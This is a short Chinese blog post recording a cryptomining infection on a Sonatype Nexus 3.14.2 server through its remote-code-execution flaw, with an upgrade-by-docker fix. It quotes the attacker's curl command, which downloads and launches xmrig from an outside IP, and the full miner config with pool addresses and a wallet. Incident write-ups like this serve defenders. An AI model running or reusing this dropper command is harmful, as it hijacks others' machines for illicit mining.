标签:ini ict 新版 cal 代码执行 http mode 14. sys
发现被执行的程序在xmrig在 /var/tmp/目录下
curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /var/tmp/config.json http://202.144.193.159/22.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;setsid ./xmrig -c config.json &
config.json内容如下:
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": true, "colors": true, "cpu-affinity": null, "cpu-priority": 5, "donate-level": 1, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 95, "pools": [ { "url": "202.144.193.8:80", "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": true, "variant": -1, "tls": false, "tls-fingerprint": null }, { "url": "185.161.70.34:3333", "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": true, "variant": -1, "tls": false, "tls-fingerprint": null }, { "url": "202.144.193.110:3333", "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": true, "variant": -1, "tls": false, "tls-fingerprint": null }, { "url": "205.185.122.99:3333", "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": true, "variant": -1, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": { "cn": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "cn-lite": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "cn-heavy": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ] }, "algo-perf": { "cn": 2.0, "cn/2": 2.0, "cn/msr": 2.0, "cn-lite": 2.0, "cn-heavy": 2.0 }, "calibrate-algo": false, "calibrate-algo-time": 10, "user-agent": null, "syslog": false, "watch": false }
还有一个可 执行的程序
xrmrig,此程序会 导致cpu爆满
删除/var/tmp/目录下的文件,然后把 程序升级 ,用docker安装的升级如下:
docker pull docker.io/sonatype/nexus3 //会自动拉去最新版本 docker run -d -p 8081:8081 -p 5000:5000 --name nexus3 -v /root/nexus-data/:/nexus-data/ --restart=always sonatype/nexus3
Sonatype Nexus Repository Manager版本3.14.2访问控制缺失及远程代码执行漏洞
标签:ini ict 新版 cal 代码执行 http mode 14. sys
原文地址:https://www.cnblogs.com/linyouyi/p/10536342.html